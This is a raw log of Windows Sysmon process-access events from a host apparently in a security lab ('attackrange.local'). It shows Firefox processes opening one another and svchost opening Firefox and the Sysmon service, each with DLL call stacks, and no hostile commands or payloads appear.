Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla 
Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.286{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program 
Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.243{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla 
Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.192{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla 
Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program 
Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.037{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000016920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.037{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla 
Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000016919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
